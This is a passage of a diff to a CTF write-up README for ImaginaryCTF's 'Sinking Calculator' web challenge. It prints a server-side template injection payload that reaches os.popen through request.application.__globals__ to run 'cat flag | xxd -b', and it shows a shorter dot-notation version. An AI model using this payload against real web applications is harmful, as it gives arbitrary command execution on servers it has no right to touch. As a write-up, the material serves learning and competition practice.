aiviaghost/CTF_Writeups/ImaginaryCTF/Web/Sinking_Calculator/README.md

 request["application"]["__globals__"]["__builtins__"]["__import__"]('os')["popen"]("cat flag | xxd -b")["read"]()
 ```

 What a mess!
-This script accesses the function ```popen``` to gain shell access to read the flag via cat and then pipe the output to xxd.
-With the -b option xxd will print the content of the file in binary, passing the numeric requirement mentioned earlier.
+This script accesses the function ```popen``` to gain shell access to read the flag via cat and then pipe the output to ```xxd```.
+With the ```-b``` option ```xxd``` will print the content of the file in binary, passing the numeric requirement mentioned earlier.
 But this is 113 characters long, no good.
 An obvious optimization is to use dot notation instead of indexing via strings, like this:

 ```python
 request.application.__globals__.__builtins__.__import__("os").popen("cat flag | xxd -b").read()